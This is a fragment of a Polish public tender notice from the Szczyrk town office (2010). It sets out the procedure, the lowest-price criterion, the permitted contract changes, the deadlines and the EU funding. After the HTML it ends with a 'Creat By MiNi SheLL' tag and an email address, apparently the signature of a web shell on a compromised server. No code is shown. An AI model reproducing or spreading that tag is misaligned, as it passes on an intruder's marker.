<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oświadczenie w trybie art.22 ustawy Pzp.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, chyba że Zamawiający przewidział możliwość dokonania takiej zmiany  oraz określił warunki takiej zmiany.
2.	Zamawiający przewiduje możliwość zmiany umowy przy zaistnieniu następujących warunków :
1) zmiana  przewidzianego w umowie terminu zakończenia robót w przypadku:  
a)  zmiany spowodowanej warunkami atmosferycznymi, w szczególności 
-  klęski żywiołowej ,
- warunków atmosferyczne odbiegające od typowych, uniemożliwiające prowadzenie robót budowlanych będących przedmiotem nadzoru (potwierdzone wpisem inspektora nadzoru) 
b)  zmiany spowodowane nieprzewidzianymi w nadzorowanych robotach warunkami geologicznymi, lub terenowymi, w szczególności istnienie nie zinwentaryzowanych  lub błędnie zinwentaryzowanych obiektów budowlanych  lub urządzeń. 
c) zmiany  będące następstwem okoliczności leżących po stronie Zamawiającego, w szczególności :
-  wstrzymanie robót przez  Zamawiającego,
- konieczności usunięcia błędów lub wprowadzenia zmian w dokumentacji projektowej lub specyfikacji technicznej wykonania i odbioru robót,
3. Pozostałe rodzaje zmian spowodowane następującymi okolicznościami .
- zmiana sposobu rozliczenia umowy lub dokonywania płatności na rzecz Wykonawcy na skutek zmiany zawartej przez Zamawiającego umowy o dofinansowanie projektu lub wytycznych dotyczących realizacji projektu.
- następstwa wprowadzenia zmian w obowiązujących przepisach prawnych mających wpływ na realizację przedmiotu zamówienia, w tym przepisów dotyczących realizacji inwestycji ze środków unijnych</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.um.szczyrk.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Szczyrku
ul. Beskidzka 4
43-370 Szczyrk
pok. 27.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.05.2010 godzina 10:00, miejsce: Urząd Miejski w Szczyrku
ul. Beskidzka 4
43-370 Szczyrk
Dziennik podawczy pok. 11.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Usługa realizowana w ramach Europejskiego  Funduszu Rozwoju Regionalnego w ramach RPO WSL 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com